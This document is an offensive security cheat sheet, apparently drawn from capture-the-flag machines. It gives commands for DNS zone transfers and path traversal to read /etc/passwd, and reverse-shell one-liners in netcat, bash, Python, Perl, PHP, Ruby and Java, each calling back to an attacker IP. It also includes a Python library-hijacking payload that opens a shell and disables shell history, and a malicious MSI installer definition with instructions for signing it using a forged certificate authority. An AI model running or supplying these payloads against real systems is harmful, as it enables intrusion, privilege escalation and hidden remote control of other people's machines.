DNS Enumeration:
	nslookup
	  >server 10.10.10.123
	  >127.0.0.1
	  >10.10.10.123
	  >bank.htb
	  >test.domain.com
	
	dnsrecon -r 127.0.0.0/24 -n 10.10.10.123
	dnsrecon -r 10.10.10.0/24 -n 10.10.10.123
	
	dig axfr @10.10.10.123
	dig axfr bank.htb @10.10.10.123
	
Bypass Restricted Shell:
	ssh USERNAME@SERVER_IP -t bash --noprofile

Parse JSON to Correct format by Python:
	curl http://SERVER_IP/fileRead.php --data 'file=../../../etc/passwd' |python -c 'import sys, json; print json.load(sys.stdin)["file"]' > passwd

ReverseShell:
	NetCat:
		rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
		/bin/sh | nc 10.0.0.1 80
		nc -e /bin/sh 10.0.0.1 1234

	Bash:
		bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
		0<&196;exec 196<>/dev/tcp/10.10.10.1/80; sh <&196 >&196 2>&196

	Python:
		python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

	
	Perl:
		perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
		
	Perl on Windows Machine:
		perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

	PHP:
		php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

	Ruby:
		ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

	Java:
		r = Runtime.getRuntime()
		p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
		p.waitFor()

Spawn Shell:
	python -c 'import pty;pty.spawn("/bin/bash");'

SUID & GUID:
		find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
		find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.

		find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
		for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
		
		
Python Library Hijacking:
(https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1542133788.pdf)
(https://rastating.github.io/privilege-escalation-via-python-library-hijacking/)
	view python path:
		python -c 'import sys; print "\n".join(sys.path)'
		python3 -c "import sys; print(sys.path)"
		
	Change (PYTHONPATH):
		To add /EVILPATH:	export PYTHONPATH=/EVILPATH
		To remove /EVILPATH: 	export PYTHONPATH=
	
	Content:
		import os
		import pty
		import socket

		lhost = "10.2.0.3"
		lport = 4444

		ZIP_DEFLATED = 0

		class ZipFile:
    			def close(*args):
      			  return

    		def write(*args):
        		return

    		def __init__(self, *args):
        		return

		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((lhost, lport))
		os.dup2(s.fileno(),0)
		os.dup2(s.fileno(),1)
		os.dup2(s.fileno(),2)
		os.putenv("HISTFILE",'/dev/null')
		pty.spawn("/bin/bash")
		s.close()
		
===========================================================================================================
Powershell:
Copy-Item C:\Path\Folder1 -Destination C:\Path\Folder2 -Recurse

===========================================================================================================
Malicious XML To Create MSI File:

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
   <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" 

            Name="Example Product Name" Version="0.0.1" Manufacturer="Example Company Name" Language="1033">
      <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
      <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>

      <Directory Id="TARGETDIR" Name="SourceDir">
         <Directory Id="ProgramFilesFolder">
            <Directory Id="INSTALLLOCATION" Name="Example">
               <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
               </Component>
            </Directory>
         </Directory>
      </Directory>

      <Feature Id="DefaultFeature" Level="1">
         <ComponentRef Id="ApplicationFiles"/>
      </Feature>

<Property Id="cmdline">cmd.exe /c "C:\users\public\desktop\shortcuts\alha.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>

   </Product>
</Wix>

======================================================================================================================
Wix ToolSet Command:

candle.exe -out C:\EtherealMSI\wixobj C:\EtherealMSI\msi.xml

light.exe -out C:\EtherealMSI\myMsi.msi C:\EtherealMSI\wixobj
======================================================================================================================
Signning The MSI File With Certificate:

C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin>makecert.exe -n "CN=Ethereal" -pe -cy end -ic C:\EtherealMSI\CompanyCA.cer -iv C:\EtherealMSI\CompanyCA.pvk -sky signature -sv C:\EtherealMSI\MyOwnCA.pvk C:\EtherealMSI\MyOwnCA.cer
Succeeded

C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin>pvk2pfx.exe -pvk C:\EtherealMSI\MyOwnCA.pvk -spc C:\EtherealMSI\MyOwnCA.cer -pfx C:\EtherealMSI\MyOwnCA.pfx

C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin>signtool sign /f C:\EtherealMSI\MyOwnCA.pfx C:\EtherealMSI\myMsi.msi
Done Adding Additional Store
Successfully signed: C:\EtherealMSI\myMsi.msi

C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin>signtool.exe verify /pa C:\EtherealMSI\myMsi.msi
SignTool Error: WinVerifyTrust returned error: 0x800B010A
        A certificate chain could not be built to a trusted root authority.
